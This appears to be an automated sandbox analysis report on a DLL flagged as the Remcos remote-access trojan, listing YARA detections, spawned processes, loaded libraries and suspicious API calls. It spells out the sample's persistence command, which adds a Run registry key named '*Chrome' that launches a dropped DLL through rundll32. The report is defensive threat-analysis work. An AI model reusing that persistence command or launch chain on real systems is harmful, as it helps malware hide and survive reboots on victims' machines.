              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winDLL@40/1@2/1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B17952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_02B17952
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A17952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_02A17952
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_02B0F474
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_02B1B4A8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_02B1AA4A
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Roaming\VIVA_01.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
              Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\bghtyi-ILS8CA
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
              Source: 7P7cuKWTfN.dllReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll"
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNow
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObject
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServer
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNowJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObjectJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServerJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1Jump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exitJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPointJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: avifil32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: d3d9.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: k7rn7l32.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: ntd3ll.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: avifil32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d3d9.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k7rn7l32.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntd3ll.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: 7P7cuKWTfN.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 7P7cuKWTfN.dllStatic file information: File size 15798272 > 1048576
              Source: 7P7cuKWTfN.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xbe1e00
              Source: 7P7cuKWTfN.dllStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x237e00
              Source: 7P7cuKWTfN.dllStatic PE information: More than 200 imports for KERNEL32.dll
              Source: 7P7cuKWTfN.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: 7P7cuKWTfN.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.1_builds\output\G2M.pdb source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_02B1CB50
              Source: 7P7cuKWTfN.dllStatic PE information: section name: .orpc
              Source: VIVA_01.dll.4.drStatic PE information: section name: .orpc
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B57106 push ecx; ret 12_2_02B57119
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B57A28 push eax; ret 12_2_02B57A46
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B5C9A6 pushfd ; retf 12_2_02B5C9A9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B5C986 pushad ; retf 12_2_02B5C989
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B5C97E push eax; retf 12_2_02B5C981
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B34E56 push ecx; ret 12_2_02B34E69
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A57106 push ecx; ret 15_2_02A57119
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A5B11B push esp; ret 15_2_02A5B141
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A57A28 push eax; ret 15_2_02A57A46
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A34E56 push ecx; ret 15_2_02A34E69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B06EB0 ShellExecuteW,URLDownloadToFileW,12_2_02B06EB0
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Roaming\VIVA_01.dllJump to dropped file

              Boot Survival

              barindex
              Creates autostart registry keys with suspicious names
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *ChromeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_02B1AA4A
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *ChromeJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *ChromeJump to behavior
